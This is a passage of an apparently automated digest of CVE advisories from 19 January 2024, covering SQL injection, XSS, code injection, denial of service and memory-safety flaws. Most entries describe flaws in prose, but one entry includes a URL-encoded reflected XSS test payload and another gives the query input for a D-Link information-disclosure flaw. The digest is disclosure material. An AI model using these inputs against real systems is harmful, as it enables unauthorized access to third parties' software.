A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

CVE ID : CVE-2024-0738
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251561 | source : cna@vuldb.com
https://vuldb.com/?id.251561 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2024-0729

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552.

CVE ID : CVE-2024-0729
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251552 | source : cna@vuldb.com
https://vuldb.com/?id.251552 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0717

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0717
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://github.com/999zzzzz/D-Link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251542 | source : cna@vuldb.com
https://vuldb.com/?id.251542 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2024-0723

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.

CVE ID : CVE-2024-0723
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251547 | source : cna@vuldb.com
https://vuldb.com/?id.251547 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0725

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.

CVE ID : CVE-2024-0725
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251548 | source : cna@vuldb.com
https://vuldb.com/?id.251548 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0731

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0731
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt | source : cna@vuldb.com
https://vuldb.com/?ctiid.251554 | source : cna@vuldb.com
https://vuldb.com/?id.251554 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0732

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.

CVE ID : CVE-2024-0732
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt | source : cna@vuldb.com
https://vuldb.com/?ctiid.251555 | source : cna@vuldb.com
https://vuldb.com/?id.251555 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0736

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.

CVE ID : CVE-2024-0736
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://0day.today/exploit/39249 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251559 | source : cna@vuldb.com
https://vuldb.com/?id.251559 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0737

First published on : 19-01-2024 22:15:07
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.

CVE ID : CVE-2024-0737
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251560 | source : cna@vuldb.com
https://vuldb.com/?id.251560 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0713

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0713
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251539 | source : cna@vuldb.com
https://vuldb.com/?id.251539 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2024-0728

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.

CVE ID : CVE-2024-0728
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251551 | source : cna@vuldb.com
https://vuldb.com/?id.251551 | source : cna@vuldb.com

Vulnerability : CWE-73


Vulnerability ID : CVE-2024-0726

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.

CVE ID : CVE-2024-0726
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251549 | source : cna@vuldb.com
https://vuldb.com/?id.251549 | source : cna@vuldb.com

Vulnerability : CWE-79


(8) LOW VULNERABILITIES [0.1, 3.9]

Source : github.com

Vulnerability ID : CVE-2024-22211

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability.

CVE ID : CVE-2024-22211
Source : security-advisories@github.com
CVSS Score : 3.7

References :
https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff | source : security-advisories@github.com
https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9 | source : security-advisories@github.com
https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59 | source : security-advisories@github.com

Vulnerability : CWE-122
Vulnerability : CWE-190


Vulnerability ID : CVE-2024-23329

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-23329
Source : security-advisories@github.com
CVSS Score : 3.7

References :
https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f | source : security-advisories@github.com
https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr | source : security-advisories@github.com

Vulnerability : CWE-863


Source : vuldb.com

Vulnerability ID : CVE-2024-0720

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0720
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251544 | source : cna@vuldb.com
https://vuldb.com/?id.251544 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0721

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.

CVE ID : CVE-2024-0721
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251545 | source : cna@vuldb.com
https://vuldb.com/?id.251545 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0722

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0722
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251546 | source : cna@vuldb.com
https://vuldb.com/?id.251546 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0716

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0716
Source : cna@vuldb.com
CVSS Score : 3.1

References :
https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251541 | source : cna@vuldb.com
https://vuldb.com/?id.251541 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2024-0718

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.

CVE ID : CVE-2024-0718
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251543 | source : cna@vuldb.com
https://vuldb.com/?id.251543 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : lenovo.com

Vulnerability ID : CVE-2023-5081

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier.

CVE ID : CVE-2023-5081
Source : psirt@lenovo.com
CVSS Score : 3.3

References :
https://support.lenovo.com/us/en/product_security/LEN-142135 | source : psirt@lenovo.com

Vulnerability : CWE-200


(48) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : jpcert.or.jp

Vulnerability ID : CVE-2024-23387

First published on : 19-01-2024 04:15:09
Last modified on : 19-01-2024 15:56:26

Description :
FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.

CVE ID : CVE-2024-23387
Source : vultures@jpcert.or.jp
CVSS Score : /

References :
https://github.com/fusionpbx/fusionpbx/ | source : vultures@jpcert.or.jp
https://jvn.jp/en/jp/JVN67215338/ | source : vultures@jpcert.or.jp
https://www.fusionpbx.com/ | source : vultures@jpcert.or.jp


Source : mitre.org

Vulnerability ID : CVE-2024-23659

First published on : 19-01-2024 05:15:09
Last modified on : 19-01-2024 15:56:26

Description :
SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.

CVE ID : CVE-2024-23659
Source : cve@mitre.org
CVSS Score : /

References :
https://blog.spip.net/Mise-a-jour-de-maintenance-et-securite-sortie-de-SPIP-4-2-8-SPIP-4-1-14.html?lang=fr | source : cve@mitre.org
https://git.spip.net/spip/bigup/commit/0757f015717cb72b84dba0e9a375ec71caddf1c2 | source : cve@mitre.org
https://git.spip.net/spip/bigup/commit/ada821c076d67d1147a195178223d0b4a6d8cecc | source : cve@mitre.org


Vulnerability ID : CVE-2023-27168

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:26

Description :
An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file.

CVE ID : CVE-2023-27168
Source : cve@mitre.org
CVSS Score : /

References :
https://balwurk.com | source : cve@mitre.org
https://balwurk.github.io/CVE-2023-27168/ | source : cve@mitre.org
https://writeback4t.com | source : cve@mitre.org
https://www.xpand-it.com | source : cve@mitre.org


Vulnerability ID : CVE-2023-43985

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component.

CVE ID : CVE-2023-43985
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2024/01/18/stblogsearch.html | source : cve@mitre.org
https://www.sunnytoo.com/product/panda-creative-responsive-prestashop-theme | source : cve@mitre.org


Vulnerability ID : CVE-2023-46351

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The methods `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

CVE ID : CVE-2023-46351
Source : cve@mitre.org
CVSS Score : /

References :
https://mypresta.eu/modules/front-office-features/manufacturers-brands-images-block.html | source : cve@mitre.org
https://security.friendsofpresta.org/modules/2024/01/18/mib.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-50028

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module "Sliding cart block" (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection.

CVE ID : CVE-2023-50028
Source : cve@mitre.org
CVSS Score : /

References :
https://addons.prestashop.com/en/express-checkout-process/3321-block-sliding-cart.html | source : cve@mitre.org
https://security.friendsofpresta.org/modules/2024/01/16/blockslidingcart.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-50030

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module "Jms Setting" (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection.

CVE ID : CVE-2023-50030
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2024/01/16/jmssetting.html | source : cve@mitre.org
https://www.joommasters.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51946

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.

CVE ID : CVE-2023-51946
Source : cve@mitre.org
CVSS Score : /

References :
http://actidata.com | source : cve@mitre.org
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51946/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2023-51947

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication.

CVE ID : CVE-2023-51947
Source : cve@mitre.org
CVSS Score : /

References :
http://actinas-plus-sl-2u-8-rdx.com | source : cve@mitre.org
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51947/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2023-51948

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application.

CVE ID : CVE-2023-51948
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51948/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2024-22876

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator.

CVE ID : CVE-2024-22876
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-002.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22877

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.

CVE ID : CVE-2024-22877
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-001.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22562

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c.

CVE ID : CVE-2024-22562
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/210 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22563

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c.

CVE ID : CVE-2024-22563
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/openvswitch/ovs-issues/issues/315 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22920

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.

CVE ID : CVE-2024-22920
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/211 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47033

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.

CVE ID : CVE-2023-47033
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/address/0xF0C9975eFd521282c2DF55774251912d691aC4d9 | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-47034

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.

CVE ID : CVE-2023-47034
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/address/0xdB94c67460DdaA9D6a9d6a2B855B5440f9afEb7C | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22911

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.

CVE ID : CVE-2024-22911
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/216 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22912

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22912
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/212 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22913

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22913
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/213 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22914

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service.

CVE ID : CVE-2024-22914
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/214 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22915

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22915
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/215 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22919

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.

CVE ID : CVE-2024-22919
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/209 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22955

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576.

CVE ID : CVE-2024-22955
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/207 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22956

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838

CVE ID : CVE-2024-22956
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/208 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22957

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190.

CVE ID : CVE-2024-22957
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/206 | source : cve@mitre.org


Vulnerability ID : CVE-2023-33295

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Cohesity DataProtect 6.8.1 and 6.6.0d was discovered to have a incorrect access control vulnerability due to a lack of TLS Certificate Validation.

CVE ID : CVE-2023-33295
Source : cve@mitre.org
CVSS Score : /

References :
https://cohesity.com | source : cve@mitre.org
https://github.com/cohesity/SecAdvisory/blob/master/CVE-2023-33295.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-43956

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 20:15:11

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-36263. Reason: This record is a duplicate of CVE-2023-36263. Notes: All CVE users should reference CVE-2023-36263 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.

CVE ID : CVE-2023-43956
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-45485

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 20:15:11

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

CVE ID : CVE-2023-45485
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-47035

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.

CVE ID : CVE-2023-47035
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/token/0x3b08c03fa8278cf81b9043b228183760376fcdbb | source : cve@mitre.org
